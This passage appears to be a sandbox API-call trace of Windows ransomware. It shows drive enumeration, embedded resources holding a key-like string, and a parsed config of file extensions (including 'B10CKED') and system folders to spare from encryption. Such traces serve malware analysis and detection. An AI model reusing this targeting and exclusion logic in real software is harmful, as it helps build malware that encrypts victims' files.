returned 1 [0093.979] GetSidSubAuthorityCount (pSid=0x1c75a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x1c75a9 [0093.979] GetSidSubAuthority (pSid=0x1c75a8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x1c75b0 [0093.979] LocalFree (hMem=0x1c75a0) returned 0x0 [0093.979] CloseHandle (hObject=0xb8) returned 1 [0093.979] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0093.979] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0093.979] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0093.979] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0093.980] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0093.981] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0093.981] GetDriveTypeW 
(lpRootPathName="C:\\") returned 0x3 [0093.981] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0093.981] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0093.981] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0093.981] LockResource (hResData=0x516824) returned 0x516824 [0093.981] FreeResource (hResData=0x516824) returned 0 [0093.981] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0093.982] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0093.982] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0093.982] LockResource (hResData=0x50d64c) returned 0x50d64c [0093.982] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361cc8, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0093.982] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1361cc8, cbMultiByte=38, lpWideCharStr=0x133deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0093.982] FreeResource (hResData=0x50d64c) returned 0 [0093.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1361ccc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0093.982] GetCurrentThreadId () returned 0xaf0 [0093.982] GetCurrentThreadId () returned 0xaf0 [0093.982] GetCurrentThreadId () returned 0xaf0 [0093.982] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fee18, cbMultiByte=615, 
lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0093.982] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fee18, cbMultiByte=615, lpWideCharStr=0x1304f7c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.982] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, 
lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 
lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 
[0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, 
lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.984] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", 
cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0093.985] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.985] CompareStringW (Locale=0x400, 
dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0093.986] CompareStringW (Locale=0x400, 